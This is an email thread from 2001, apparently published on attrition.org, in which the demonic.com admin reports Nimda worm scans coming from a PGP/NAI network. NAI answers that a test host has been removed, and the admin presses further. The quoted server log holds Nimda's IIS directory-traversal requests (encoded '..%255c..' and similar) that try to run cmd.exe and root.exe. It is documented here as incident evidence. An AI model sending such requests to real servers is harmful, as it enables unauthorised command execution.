The following is an e-mail thread between me and PGP after receiving NIMBA signature attacks against demonic.com. The last mail i sent was never responded to.


From: jericho@demonic.com
To: hostmaster@NAI.COM, postmaster@pgp.com, pr@NAI.COM, security@NAI.COM,
    security@pgp.com
Date: Sat, 27 Oct 2001 23:21:29 -0600 (MDT)
Subject: security incident at pgp.com or malicious activity 


We received the following hits to demonic.com today. These are typically
the signature of the Nimda worm I believe (reference:
http://vil.nai.com/vil/virusSummary.asp?virus_k=99209).

So I'm curious given the nature of your site..

Is a TIS/PGP host infected with Nimda?

If so, was this oversight on your staff's part? Or did a worm get loose on
your network during testing?

I'm wracking my brain here trying to come up with a valid reason that
a TIS owned IP would be scanning us like this..

Trusted Information Systems (NET-TIS-NET-155) TIS-NET-155
                         204.254.155.0 - 204.254.155.255


204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:46 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 265 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.254.155.201 - - [27/Oct/2001:20:59:47 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-"
"-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
204.254.155.201 - - [27/Oct/2001:20:59:48 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-"
"-"
204.254.155.201 - - [27/Oct/2001:20:59:56 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"




From: IT Security (IT_Security@NAI.com)
To: "'jericho@demonic.com'" (jericho@demonic.com)
Date: Tue, 30 Oct 2001 16:30:55 -0600
Subject: RE: security incident at pgp.com or malicious activity 

	
Thank you for bringing this to our attention.

This network is part of a development and test network in one of our
Engineering facilities. 
The host has now been removed from public access.


Thanks again.

IT Security.

From: jericho@demonic.com
To: IT Security (IT_Security@NAI.com)
Date: Tue, 30 Oct 2001 21:07:37 -0700 (MST)
Subject: RE: security incident at pgp.com or malicious activity 


: Thank you for bringing this to our attention.
: 
: This network is part of a development and test network in one of our
: Engineering facilities.  The host has now been removed from public
: access.

Would you care to comment why a test machine (presumeably for internal
testing) was network connected and left unchecked so as to allow it to
attack other machines?



main page ATTRITION feedback